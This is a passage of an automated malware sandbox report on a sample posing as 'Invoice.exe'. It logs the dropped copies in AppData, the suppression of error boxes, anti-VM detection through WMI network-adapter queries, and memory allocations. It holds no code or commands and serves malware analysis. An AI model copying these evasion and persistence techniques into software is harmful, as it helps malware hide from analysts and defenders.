Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: kaJNzBnxbXm.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BjTxJte.exe PID: 7948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BjTxJte.exe PID: 4040, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: 1230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: 2E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: 14B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: 7F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: 8F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: 90F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: A0F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: A680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: B680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: C680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: 2890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: 4890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Memory allocated: A60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Memory allocated: 2670000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Memory allocated: 4670000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Memory allocated: 7140000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Memory allocated: 8140000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Memory allocated: 82E0000 memory reserve \| memory write watch
